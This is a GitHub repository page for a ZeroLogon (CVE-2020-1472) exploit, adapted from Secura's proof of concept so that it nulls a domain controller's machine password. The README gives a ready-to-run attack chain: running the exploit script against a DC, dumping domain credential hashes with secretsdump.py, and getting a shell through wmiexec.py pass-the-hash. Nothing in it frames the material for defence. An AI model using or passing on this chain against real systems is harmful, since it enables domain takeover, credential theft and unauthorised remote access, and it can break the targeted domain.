Skip to content

Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null

Notifications You must be signed in to change notification settings

hell-moon/ZeroLogon-Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

ZeroLogon - Exploit and Example

Modified the test PoC from Secura, CVE-2020-1472, in order to change the machine's password to null. Changing the password on the machine uses Microsoft's NetrServerPasswordSet2() function. This exploit takes advantage of Impacket's nrpc.py module to call NetrServerPasswordSet2().

Run the exploit

./zerologon_NULLPASS.py <dc-name> <dc-ip>

Dump the hashes

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

Pass-The-Hash for shell access

wmiexec.py -hashes <LM:NT> <username>@<ip>

About

Modified the test PoC from Secura, CVE-2020-1472, to change the machine password to null

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages